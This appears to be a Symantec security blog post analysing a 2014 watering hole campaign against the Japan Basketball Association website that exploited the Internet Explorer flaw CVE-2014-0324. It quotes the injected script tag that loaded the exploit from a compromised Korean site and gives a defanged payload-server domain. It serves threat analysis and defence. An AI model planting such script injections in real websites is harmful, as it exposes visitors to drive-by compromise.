Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.
Figure 1. JBA landing page
The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. In all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website hosting the exploit code located in Seoul, South Korea. The following is an example of the script used in the attacks:
<script type="text/javascript" src="https://www.[REMOVED].kr/uc/inc_jba.php"></script>
The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:
- inc_jba.php
- inc_front_us-en.php
- inc_front_ja-jp.php
- inc_front-2007.php
- inc_front-2010.php
- inc-module.jpg
The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment things such as the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also checks if the browser has ever visited the page before by using a cookie as a check. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for different environments:
- Windows XP – English (EN)
- Windows XP - Japanese
- Windows 7 with Office 2007 on a x86 computer
- Windows 7 with Office 2010 on a x86 computer
If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:
https://login[dot]imicrosoft[dot]org/feed
Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the Unites States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.
Figure 2. Login screen of the VPS site
The attackers had either a strategy to close shop quickly to make their campaign short lived or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.
From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.
Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.
The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.
Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude the network.
Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):
AV
IPS